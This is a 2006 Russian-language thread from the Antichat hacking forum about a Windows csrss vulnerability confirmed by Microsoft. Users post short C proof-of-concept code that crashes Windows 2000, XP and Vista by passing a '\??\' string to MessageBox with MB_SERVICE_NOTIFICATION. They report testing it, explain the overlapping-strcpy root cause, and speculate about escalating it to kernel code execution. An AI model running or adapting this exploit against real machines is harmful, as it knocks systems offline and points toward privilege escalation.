Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   MS подтвердила существование уязвимости в подcистеме csrss (https://forum.antichat.xyz/showthread.php?t=29837)

KPOT_f!nd 25.12.2006 03:14

MS подтвердила существование уязвимости в подcистеме csrss
 
В блоге Microsoft Security Response Center
появилось подтверждение существования ошибки в Client Server Run-Time Subsystem, которая может привести к повышению локальных привилегий. Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox. Пока в Microsoft сохраняют спокойствие, продолжая считать Висту самой безопасной современной платформой и отслеживая ситуацию, связанную с этой уязвимостью.
Источник: www.mazafaka.ru

_Great_ 25.12.2006 08:13

Цитата:

Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox.
да епт при чем тут месажбокс. система вылетает на уровне ядра в функции NtRaiseHardError, которая неккоректно обрабатывает строку, начинающуюся на \??\.

Цитата:

продолжая считать Висту самой безопасной современной платформой
гыгы, ну-ну...

-=lebed=- 25.12.2006 11:56

А вот и сам сплоит:
Цитата:

#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
Кто затестил?
Взят отсюда http://www.security.nnov.ru
Ссылка по теме: http://www.kuban.ru/forum_new/forum2/files/19124.html

Talisman 25.12.2006 12:35

хы... как юнит скомпилил в бдске - нифига винда не вылетает)
приду вечером, надеюсь добью багсу...

_Great_ 25.12.2006 14:14

я тестил, работает. сплоит можно сократить до

Код:

#include <windows.h>

int main(void){
int i;
char bug [] ="\\??\\";
for(i = 0; i < 10; i ++) MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION);
}

Работает на ура.
MessageBox при флаге MB_SERVICE_NOTIFICATION вызывает на самом деле ntdll!NtRaiseHardError для показа окошка, а она - переходник для функции ядра ntoskrnl!NtRaiseHardError.
В ней идет обработка первых символов \??\ весьма причудливым образом.
Как написано в письме, отосланном в микрософт, ]it looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level.

Вот такие пироги. Если повезет, можно накатать сплоит для выполнения кода в режиме ядра, последствия чего пояснять не стоит.

Уязвимые версии - 2000 (все сп), XP ( все сп), Vista.
Однако микрософт продолжает считать Висту защищенной. Ну-ну

Вот такие пироги, в кратце)


UPD: Кусок кода NtRaiseHardError:
Код:

} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );

по документации strcpy: The behavior of strcpy is undefined if the source and destination strings overlap.

karabym 26.12.2006 09:59

Хехе Билли как всегда слепо верит что от его творения неcмогут отказаться :)


Время: 03:07